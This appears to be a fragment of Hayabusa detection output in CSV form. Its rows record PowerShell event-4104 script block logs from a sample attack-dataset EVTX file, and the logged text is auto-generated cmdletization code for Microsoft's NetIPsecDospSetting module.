$false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmd,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmd,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"letization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetNa",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 